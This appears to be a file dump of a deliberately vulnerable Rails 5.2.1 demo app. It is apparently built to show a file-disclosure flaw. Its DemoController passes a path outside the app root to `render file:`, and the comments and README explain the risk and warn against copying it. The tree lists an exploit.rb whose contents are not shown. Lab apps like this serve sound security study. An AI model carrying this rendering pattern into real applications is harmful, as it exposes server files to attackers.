├── demo-5.2.1 ├── log │ └── .keep ├── tmp │ └── .keep ├── vendor │ └── .keep ├── lib │ ├── assets │ │ └── .keep │ └── tasks │ │ └── .keep ├── storage │ └── .keep ├── test │ ├── models │ │ └── .keep │ ├── system │ │ └── .keep │ ├── controllers │ │ ├── .keep │ │ └── demo_controller_test.rb │ ├── fixtures │ │ ├── .keep │ │ └── files │ │ │ └── .keep │ ├── helpers │ │ └── .keep │ ├── integration │ │ └── .keep │ ├── mailers │ │ └── .keep │ ├── application_system_test_case.rb │ └── test_helper.rb ├── public │ ├── favicon.ico │ ├── apple-touch-icon.png │ ├── apple-touch-icon-precomposed.png │ ├── robots.txt │ ├── 500.html │ ├── 422.html │ └── 404.html ├── .ruby-version ├── app │ ├── assets │ │ ├── images │ │ │ └── .keep │ │ ├── javascripts │ │ │ ├── channels │ │ │ │ └── .keep │ │ │ ├── demo.coffee │ │ │ ├── cable.js │ │ │ └── application.js │ │ ├── config │ │ │ └── manifest.js │ │ └── stylesheets │ │ │ ├── demo.scss │ │ │ └── application.css │ ├── models │ │ ├── concerns │ │ │ └── .keep │ │ └── application_record.rb │ ├── controllers │ │ ├── concerns │ │ │ └── .keep │ │ ├── application_controller.rb │ │ └── demo_controller.rb │ ├── views │ │ └── layouts │ │ │ ├── mailer.text.erb │ │ │ ├── application.html.erb │ │ │ └── mailer.html.erb │ ├── helpers │ │ ├── demo_helper.rb │ │ └── application_helper.rb │ ├── jobs │ │ └── application_job.rb │ ├── channels │ │ └── application_cable │ │ │ ├── channel.rb │ │ │ └── connection.rb │ └── mailers │ │ └── application_mailer.rb ├── README.md ├── package.json ├── bin │ ├── rake │ ├── bundle │ ├── rails │ ├── yarn │ ├── update │ └── setup ├── config │ ├── spring.rb │ ├── environment.rb │ ├── routes.rb │ ├── initializers │ │ ├── mime_types.rb │ │ ├── filter_parameter_logging.rb │ │ ├── application_controller_renderer.rb │ │ ├── cookies_serializer.rb │ │ ├── backtrace_silencers.rb │ │ ├── wrap_parameters.rb │ │ ├── assets.rb │ │ ├── inflections.rb │ │ └── content_security_policy.rb │ ├── boot.rb │ ├── cable.yml │ ├── credentials.yml.enc │ 
├── database.yml │ ├── application.rb │ ├── locales │ │ └── en.yml │ ├── storage.yml │ ├── puma.rb │ └── environments │ │ ├── test.rb │ │ ├── development.rb │ │ └── production.rb ├── config.ru ├── Rakefile ├── db │ └── seeds.rb ├── .gitignore ├── Gemfile └── Gemfile.lock ├── exploit.rb └── README.md /demo-5.2.1/log/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/tmp/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/vendor/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/lib/assets/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/lib/tasks/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/storage/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/models/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/system/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/public/favicon.ico: -------------------------------------------------------------------------------- 1 | 
-------------------------------------------------------------------------------- /demo-5.2.1/test/controllers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/fixtures/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/helpers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/integration/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/mailers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/.ruby-version: -------------------------------------------------------------------------------- 1 | ruby-2.5.1 -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/images/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/app/models/concerns/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/public/apple-touch-icon.png: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/fixtures/files/.keep: 
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/demo-5.2.1/app/controllers/concerns/.keep:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/demo-5.2.1/app/assets/javascripts/channels/.keep:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/demo-5.2.1/public/apple-touch-icon-precomposed.png:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/demo-5.2.1/app/views/layouts/mailer.text.erb:
--------------------------------------------------------------------------------
<%= yield %>
--------------------------------------------------------------------------------
/demo-5.2.1/app/helpers/demo_helper.rb:
--------------------------------------------------------------------------------
module DemoHelper
end
--------------------------------------------------------------------------------
/demo-5.2.1/app/helpers/application_helper.rb:
--------------------------------------------------------------------------------
module ApplicationHelper
end
--------------------------------------------------------------------------------
/demo-5.2.1/app/jobs/application_job.rb:
--------------------------------------------------------------------------------
class ApplicationJob < ActiveJob::Base
end
--------------------------------------------------------------------------------
/demo-5.2.1/README.md:
--------------------------------------------------------------------------------
# README

```
bundle install
rails s -b 0.0.0.0 -e production
```

Note: `-b 0.0.0.0` binds the server to every network interface, and this application deliberately exposes a file-disclosure endpoint (`DemoController#index` renders a file outside the application root via `render file:`; the sibling `exploit.rb` presumably targets it). Run it only on an isolated lab host or network — or bind to `127.0.0.1` and tunnel in — never on a shared or internet-facing machine. Because `config/master.key` is gitignored and absent from this tree, booting in production will likely also need `SECRET_KEY_BASE` (or the key itself) exported; confirm locally.
-------------------------------------------------------------------------------- /demo-5.2.1/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "demo-5_2_1", 3 | "private": true, 4 | "dependencies": {} 5 | } 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/controllers/application_controller.rb: -------------------------------------------------------------------------------- 1 | class ApplicationController < ActionController::Base 2 | end 3 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/rake: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require_relative '../config/boot' 3 | require 'rake' 4 | Rake.application.run 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/models/application_record.rb: -------------------------------------------------------------------------------- 1 | class ApplicationRecord < ActiveRecord::Base 2 | self.abstract_class = true 3 | end 4 | -------------------------------------------------------------------------------- /demo-5.2.1/public/robots.txt: -------------------------------------------------------------------------------- 1 | # See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file 2 | -------------------------------------------------------------------------------- /demo-5.2.1/app/channels/application_cable/channel.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Channel < ActionCable::Channel::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/config/manifest.js: -------------------------------------------------------------------------------- 1 | //= link_tree ../images 2 
| //= link_directory ../javascripts .js 3 | //= link_directory ../stylesheets .css 4 | -------------------------------------------------------------------------------- /demo-5.2.1/app/channels/application_cable/connection.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Connection < ActionCable::Connection::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/bundle: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 3 | load Gem.bin_path('bundler', 'bundle') 4 | -------------------------------------------------------------------------------- /demo-5.2.1/app/mailers/application_mailer.rb: -------------------------------------------------------------------------------- 1 | class ApplicationMailer < ActionMailer::Base 2 | default from: 'from@example.com' 3 | layout 'mailer' 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/config/spring.rb: -------------------------------------------------------------------------------- 1 | %w[ 2 | .ruby-version 3 | .rbenv-vars 4 | tmp/restart.txt 5 | tmp/caching-dev.txt 6 | ].each { |path| Spring.watch(path) } 7 | -------------------------------------------------------------------------------- /demo-5.2.1/config.ru: -------------------------------------------------------------------------------- 1 | # This file is used by Rack-based servers to start the application. 
require_relative 'config/environment'

run Rails.application
--------------------------------------------------------------------------------
/demo-5.2.1/app/controllers/demo_controller.rb:
--------------------------------------------------------------------------------
# Single-action controller that serves the repository's top-level README
# (one directory above Rails.root, i.e. outside the application).
#
# SECURITY (review): this is the intentionally vulnerable endpoint of the demo
# and must not be copied into real code. Two things make it dangerous:
#   * the path handed to `render file:` already escapes the app root
#     (`#{Rails.root}/../README.md`), so the view layer is used as a raw file
#     reader; and
#   * the project is pinned to an old Rails (directory name "demo-5.2.1",
#     `config.load_defaults 5.2`; confirm in Gemfile.lock). On that release
#     `render file:` resolves the path through the template lookup, where the
#     request's Accept header can influence the resolved path — presumably the
#     behaviour the sibling exploit.rb exercises; verify against that script.
# A fixed file should be served without going through the view resolver, e.g.
#   send_file File.expand_path('../README.md', Rails.root),
#             type: 'text/plain', disposition: 'inline'
# and the demo itself should only ever run on an isolated lab host.
class DemoController < ApplicationController
  # GET /demo — responds with the contents of ../README.md relative to Rails.root.
  def index
    render file: "#{Rails.root}/../README.md"
  end
end
--------------------------------------------------------------------------------
/demo-5.2.1/bin/rails:
--------------------------------------------------------------------------------
#!/usr/bin/env ruby
APP_PATH = File.expand_path('../config/application', __dir__)
require_relative '../config/boot'
require 'rails/commands'
--------------------------------------------------------------------------------
/demo-5.2.1/config/environment.rb:
--------------------------------------------------------------------------------
# Load the Rails application.
require_relative 'application'

# Initialize the Rails application.
Rails.application.initialize!
6 | -------------------------------------------------------------------------------- /demo-5.2.1/config/routes.rb: -------------------------------------------------------------------------------- 1 | Rails.application.routes.draw do 2 | # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html 3 | resources :demo 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/views/layouts/application.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Demo521 5 | 6 | 7 | 8 | <%= yield %> 9 | 10 | 11 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/mime_types.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new mime types for use in respond_to blocks: 4 | # Mime::Type.register "text/richtext", :rtf 5 | -------------------------------------------------------------------------------- /demo-5.2.1/test/controllers/demo_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class DemoControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /demo-5.2.1/test/application_system_test_case.rb: -------------------------------------------------------------------------------- 1 | require "test_helper" 2 | 3 | class ApplicationSystemTestCase < ActionDispatch::SystemTestCase 4 | driven_by :selenium, using: :chrome, screen_size: [1400, 1400] 5 | end 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/stylesheets/demo.scss: 
-------------------------------------------------------------------------------- 1 | // Place all the styles related to the demo controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /demo-5.2.1/config/boot.rb: -------------------------------------------------------------------------------- 1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 2 | 3 | require 'bundler/setup' # Set up gems listed in the Gemfile. 4 | require 'bootsnap/setup' # Speed up boot time by caching expensive operations. 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/demo.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/filter_parameter_logging.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Configure sensitive parameters which will be filtered from the log file. 4 | Rails.application.config.filter_parameters += [:password] 5 | -------------------------------------------------------------------------------- /demo-5.2.1/Rakefile: -------------------------------------------------------------------------------- 1 | # Add your own tasks in files placed in lib/tasks ending in .rake, 2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. 
3 | 4 | require_relative 'config/application' 5 | 6 | Rails.application.load_tasks 7 | -------------------------------------------------------------------------------- /demo-5.2.1/config/cable.yml: -------------------------------------------------------------------------------- 1 | development: 2 | adapter: async 3 | 4 | test: 5 | adapter: async 6 | 7 | production: 8 | adapter: redis 9 | url: <%= ENV.fetch("REDIS_URL") { "redis://localhost:6379/1" } %> 10 | channel_prefix: demo-5_2_1_production 11 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/application_controller_renderer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # ActiveSupport::Reloader.to_prepare do 4 | # ApplicationController.renderer.defaults.merge!( 5 | # http_host: 'example.org', 6 | # https: false 7 | # ) 8 | # end 9 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/cookies_serializer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Specify a serializer for the signed and encrypted cookie jars. 4 | # Valid options are :json, :marshal, and :hybrid. 
5 | Rails.application.config.action_dispatch.cookies_serializer = :json 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/views/layouts/mailer.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | 11 | <%= yield %> 12 | 13 | 14 | -------------------------------------------------------------------------------- /demo-5.2.1/test/test_helper.rb: -------------------------------------------------------------------------------- 1 | ENV['RAILS_ENV'] ||= 'test' 2 | require_relative '../config/environment' 3 | require 'rails/test_help' 4 | 5 | class ActiveSupport::TestCase 6 | # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order. 7 | fixtures :all 8 | 9 | # Add more helper methods to be used by all tests here... 10 | end 11 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/yarn: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | APP_ROOT = File.expand_path('..', __dir__) 3 | Dir.chdir(APP_ROOT) do 4 | begin 5 | exec "yarnpkg", *ARGV 6 | rescue Errno::ENOENT 7 | $stderr.puts "Yarn executable was not detected in the system." 8 | $stderr.puts "Download Yarn at https://yarnpkg.com/en/docs/install" 9 | exit 1 10 | end 11 | end 12 | -------------------------------------------------------------------------------- /demo-5.2.1/db/seeds.rb: -------------------------------------------------------------------------------- 1 | # This file should contain all the record creation needed to seed the database with its default values. 2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). 
3 | # 4 | # Examples: 5 | # 6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) 7 | # Character.create(name: 'Luke', movie: movies.first) 8 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/cable.js: -------------------------------------------------------------------------------- 1 | // Action Cable provides the framework to deal with WebSockets in Rails. 2 | // You can generate new channels where WebSocket features live using the `rails generate channel` command. 3 | // 4 | //= require action_cable 5 | //= require_self 6 | //= require_tree ./channels 7 | 8 | (function() { 9 | this.App || (this.App = {}); 10 | 11 | App.cable = ActionCable.createConsumer(); 12 | 13 | }).call(this); 14 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/backtrace_silencers.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. 4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } 5 | 6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. 7 | # Rails.backtrace_cleaner.remove_silencers! 
8 | -------------------------------------------------------------------------------- /demo-5.2.1/config/credentials.yml.enc: -------------------------------------------------------------------------------- 1 | uyC5cJnKq9nsPW4V3KlcQn29EYKKrvk+2AuNmTIswIxM09jitAUcs5IrA1VVjoJUqlkPfY7hyWI1E5RLKjGoBkl7azkBygVCvh8MD2QqxKKBK3demtfjVBB2as440TL4K6qPE9wCt50T6gLieIsJ5r3/88sGMPHZhrJflGAYPNdpFBaIPW6eXBnUFH3QWcosBwo9z6ku7KWqYi49QV8mhwwQzwbIxrb63cbO2C34zKnzDQ3UL7ye6XX3nZ9B7ubVkPBG/QFNt5cy/F3JQicj7zRGe94Mz+j66kVBqE8b4lSTcdDoR330DynoA1CANgJhLY17Xh3fXzf69sJa1WGn2mLixQ6g/fA7EZKfBFydpPKjRrPAGkUn1XNMwpUTpRC6c9JmoWIOXFyZhOWSOxXaxSulDeqS56t0aa9N--OW6vPNPO7A2eQQYE--dk4YvVIsGriIoiwZSE07Zw== -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/wrap_parameters.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # This file contains settings for ActionController::ParamsWrapper which 4 | # is enabled by default. 5 | 6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. 7 | ActiveSupport.on_load(:action_controller) do 8 | wrap_parameters format: [:json] 9 | end 10 | 11 | # To enable root element in JSON for ActiveRecord objects. 12 | # ActiveSupport.on_load(:active_record) do 13 | # self.include_root_in_json = true 14 | # end 15 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/assets.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Version of your assets, change this if you want to expire all your assets. 4 | Rails.application.config.assets.version = '1.0' 5 | 6 | # Add additional assets to the asset load path. 
7 | # Rails.application.config.assets.paths << Emoji.images_path 8 | # Add Yarn node_modules folder to the asset load path. 9 | Rails.application.config.assets.paths << Rails.root.join('node_modules') 10 | 11 | # Precompile additional assets. 12 | # application.js, application.css, and all non-JS/CSS in the app/assets 13 | # folder are already added. 14 | # Rails.application.config.assets.precompile += %w( admin.js admin.css ) 15 | -------------------------------------------------------------------------------- /demo-5.2.1/config/database.yml: -------------------------------------------------------------------------------- 1 | # SQLite version 3.x 2 | # gem install sqlite3 3 | # 4 | # Ensure the SQLite 3 gem is defined in your Gemfile 5 | # gem 'sqlite3' 6 | # 7 | default: &default 8 | adapter: sqlite3 9 | pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %> 10 | timeout: 5000 11 | 12 | development: 13 | <<: *default 14 | database: db/development.sqlite3 15 | 16 | # Warning: The database defined as "test" will be erased and 17 | # re-generated from your development database when you run "rake". 18 | # Do not set this db to the same as development or production. 19 | test: 20 | <<: *default 21 | database: db/test.sqlite3 22 | 23 | production: 24 | <<: *default 25 | database: db/production.sqlite3 26 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/inflections.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new inflection rules using the following format. Inflections 4 | # are locale specific, and you may define rules for as many different 5 | # locales as you wish. 
All of these examples are active by default: 6 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 7 | # inflect.plural /^(ox)$/i, '\1en' 8 | # inflect.singular /^(ox)en/i, '\1' 9 | # inflect.irregular 'person', 'people' 10 | # inflect.uncountable %w( fish sheep ) 11 | # end 12 | 13 | # These inflection rules are supported but not enabled by default: 14 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 15 | # inflect.acronym 'RESTful' 16 | # end 17 | -------------------------------------------------------------------------------- /demo-5.2.1/config/application.rb: -------------------------------------------------------------------------------- 1 | require_relative 'boot' 2 | 3 | require 'rails/all' 4 | 5 | # Require the gems listed in Gemfile, including any gems 6 | # you've limited to :test, :development, or :production. 7 | Bundler.require(*Rails.groups) 8 | 9 | module Demo521 10 | class Application < Rails::Application 11 | # Initialize configuration defaults for originally generated Rails version. 12 | config.load_defaults 5.2 13 | 14 | # Settings in config/environments/* take precedence over those specified here. 15 | # Application configuration can go into files in config/initializers 16 | # -- all .rb files in that directory are automatically loaded after loading 17 | # the framework and any gems in your application. 18 | end 19 | end 20 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/stylesheets/application.css: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a manifest file that'll be compiled into application.css, which will include all the files 3 | * listed below. 4 | * 5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, or any plugin's 6 | * vendor/assets/stylesheets directory can be referenced here using a relative path. 
7 | * 8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the 9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS 10 | * files in this directory. Styles in this file should be added after the last require_* statement. 11 | * It is generally better to create a new file per style scope. 12 | * 13 | *= require_tree . 14 | *= require_self 15 | */ 16 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/application.js: -------------------------------------------------------------------------------- 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files 2 | // listed below. 3 | // 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, or any plugin's 5 | // vendor/assets/javascripts directory can be referenced here using a relative path. 6 | // 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement. 9 | // 10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details 11 | // about supported directives. 12 | // 13 | //= require rails-ujs 14 | //= require activestorage 15 | //= require turbolinks 16 | //= require_tree . 17 | -------------------------------------------------------------------------------- /demo-5.2.1/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files for more about ignoring files. 2 | # 3 | # If you find yourself ignoring temporary files generated by your text editor 4 | # or operating system, you probably want to add a global ignore instead: 5 | # git config --global core.excludesfile '~/.gitignore_global' 6 | 7 | # Ignore bundler config. 
8 | /.bundle 9 | 10 | # Ignore the default SQLite database. 11 | /db/*.sqlite3 12 | /db/*.sqlite3-journal 13 | 14 | # Ignore all logfiles and tempfiles. 15 | /log/* 16 | /tmp/* 17 | !/log/.keep 18 | !/tmp/.keep 19 | 20 | # Ignore uploaded files in development 21 | /storage/* 22 | !/storage/.keep 23 | 24 | /node_modules 25 | /yarn-error.log 26 | 27 | /public/assets 28 | .byebug_history 29 | 30 | # Ignore master key for decrypting credentials and more. 31 | /config/master.key 32 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/update: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'fileutils' 3 | include FileUtils 4 | 5 | # path to your application root. 6 | APP_ROOT = File.expand_path('..', __dir__) 7 | 8 | def system!(*args) 9 | system(*args) || abort("\n== Command #{args} failed ==") 10 | end 11 | 12 | chdir APP_ROOT do 13 | # This script is a way to update your development environment automatically. 14 | # Add necessary update steps to this file. 15 | 16 | puts '== Installing dependencies ==' 17 | system! 'gem install bundler --conservative' 18 | system('bundle check') || system!('bundle install') 19 | 20 | # Install JavaScript dependencies if using Yarn 21 | # system('bin/yarn') 22 | 23 | puts "\n== Updating database ==" 24 | system! 'bin/rails db:migrate' 25 | 26 | puts "\n== Removing old logs and tempfiles ==" 27 | system! 'bin/rails log:clear tmp:clear' 28 | 29 | puts "\n== Restarting application server ==" 30 | system! 'bin/rails restart' 31 | end 32 | -------------------------------------------------------------------------------- /demo-5.2.1/config/locales/en.yml: -------------------------------------------------------------------------------- 1 | # Files in the config/locales directory are used for internationalization 2 | # and are automatically loaded by Rails. 
If you want to use locales other 3 | # than English, add the necessary files in this directory. 4 | # 5 | # To use the locales, use `I18n.t`: 6 | # 7 | # I18n.t 'hello' 8 | # 9 | # In views, this is aliased to just `t`: 10 | # 11 | # <%= t('hello') %> 12 | # 13 | # To use a different locale, set it with `I18n.locale`: 14 | # 15 | # I18n.locale = :es 16 | # 17 | # This would use the information in config/locales/es.yml. 18 | # 19 | # The following keys must be escaped otherwise they will not be retrieved by 20 | # the default I18n backend: 21 | # 22 | # true, false, on, off, yes, no 23 | # 24 | # Instead, surround them with single quotes. 25 | # 26 | # en: 27 | # 'true': 'foo' 28 | # 29 | # To learn more, please read the Rails Internationalization guide 30 | # available at http://guides.rubyonrails.org/i18n.html. 31 | 32 | en: 33 | hello: "Hello world" 34 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/setup: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'fileutils' 3 | include FileUtils 4 | 5 | # path to your application root. 6 | APP_ROOT = File.expand_path('..', __dir__) 7 | 8 | def system!(*args) 9 | system(*args) || abort("\n== Command #{args} failed ==") 10 | end 11 | 12 | chdir APP_ROOT do 13 | # This script is a starting point to setup your application. 14 | # Add necessary setup steps to this file. 15 | 16 | puts '== Installing dependencies ==' 17 | system! 'gem install bundler --conservative' 18 | system('bundle check') || system!('bundle install') 19 | 20 | # Install JavaScript dependencies if using Yarn 21 | # system('bin/yarn') 22 | 23 | # puts "\n== Copying sample files ==" 24 | # unless File.exist?('config/database.yml') 25 | # cp 'config/database.yml.sample', 'config/database.yml' 26 | # end 27 | 28 | puts "\n== Preparing database ==" 29 | system! 
'bin/rails db:setup' 30 | 31 | puts "\n== Removing old logs and tempfiles ==" 32 | system! 'bin/rails log:clear tmp:clear' 33 | 34 | puts "\n== Restarting application server ==" 35 | system! 'bin/rails restart' 36 | end 37 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/content_security_policy.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Define an application-wide content security policy 4 | # For further information see the following documentation 5 | # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy 6 | 7 | # Rails.application.config.content_security_policy do |policy| 8 | # policy.default_src :self, :https 9 | # policy.font_src :self, :https, :data 10 | # policy.img_src :self, :https, :data 11 | # policy.object_src :none 12 | # policy.script_src :self, :https 13 | # policy.style_src :self, :https 14 | 15 | # # Specify URI for violation reports 16 | # # policy.report_uri "/csp-violation-report-endpoint" 17 | # end 18 | 19 | # If you are using UJS then enable automatic nonce generation 20 | # Rails.application.config.content_security_policy_nonce_generator = -> request { SecureRandom.base64(16) } 21 | 22 | # Report CSP violations to a specified URI 23 | # For further information see the following documentation: 24 | # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only 25 | # Rails.application.config.content_security_policy_report_only = true 26 | -------------------------------------------------------------------------------- /demo-5.2.1/config/storage.yml: -------------------------------------------------------------------------------- 1 | test: 2 | service: Disk 3 | root: <%= Rails.root.join("tmp/storage") %> 4 | 5 | local: 6 | service: Disk 7 | root: <%= Rails.root.join("storage") %> 8 | 9 | # Use rails 
credentials:edit to set the AWS secrets (as aws:access_key_id|secret_access_key) 10 | # amazon: 11 | # service: S3 12 | # access_key_id: <%= Rails.application.credentials.dig(:aws, :access_key_id) %> 13 | # secret_access_key: <%= Rails.application.credentials.dig(:aws, :secret_access_key) %> 14 | # region: us-east-1 15 | # bucket: your_own_bucket 16 | 17 | # Remember not to checkin your GCS keyfile to a repository 18 | # google: 19 | # service: GCS 20 | # project: your_project 21 | # credentials: <%= Rails.root.join("path/to/gcs.keyfile") %> 22 | # bucket: your_own_bucket 23 | 24 | # Use rails credentials:edit to set the Azure Storage secret (as azure_storage:storage_access_key) 25 | # microsoft: 26 | # service: AzureStorage 27 | # storage_account_name: your_account_name 28 | # storage_access_key: <%= Rails.application.credentials.dig(:azure_storage, :storage_access_key) %> 29 | # container: your_container_name 30 | 31 | # mirror: 32 | # service: Mirror 33 | # primary: local 34 | # mirrors: [ amazon, google, microsoft ] 35 | -------------------------------------------------------------------------------- /demo-5.2.1/config/puma.rb: -------------------------------------------------------------------------------- 1 | # Puma can serve each request in a thread from an internal thread pool. 2 | # The `threads` method setting takes two numbers: a minimum and maximum. 3 | # Any libraries that use thread pools should be configured to match 4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum 5 | # and maximum; this matches the default thread size of Active Record. 6 | # 7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 } 8 | threads threads_count, threads_count 9 | 10 | # Specifies the `port` that Puma will listen on to receive requests; default is 3000. 11 | # 12 | port ENV.fetch("PORT") { 3000 } 13 | 14 | # Specifies the `environment` that Puma will run in. 
15 | # 16 | environment ENV.fetch("RAILS_ENV") { "development" } 17 | 18 | # Specifies the number of `workers` to boot in clustered mode. 19 | # Workers are forked webserver processes. If using threads and workers together 20 | # the concurrency of the application would be max `threads` * `workers`. 21 | # Workers do not work on JRuby or Windows (both of which do not support 22 | # processes). 23 | # 24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 } 25 | 26 | # Use the `preload_app!` method when specifying a `workers` number. 27 | # This directive tells Puma to first boot the application and load code 28 | # before forking the application. This takes advantage of Copy On Write 29 | # process behavior so workers use less memory. 30 | # 31 | # preload_app! 32 | 33 | # Allow puma to be restarted by `rails restart` command. 34 | plugin :tmp_restart 35 | -------------------------------------------------------------------------------- /demo-5.2.1/public/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | We're sorry, but something went wrong (500) 5 | 6 | 55 | 56 | 57 | 58 | 59 |

We're sorry, but something went wrong.


If you are the application owner check the logs for more information.

65 | 66 | 67 | -------------------------------------------------------------------------------- /demo-5.2.1/public/422.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The change you wanted was rejected (422) 5 | 6 | 55 | 56 | 57 | 58 | 59 |

The change you wanted was rejected.


Maybe you tried to change something you didn't have access to.


If you are the application owner check the logs for more information.

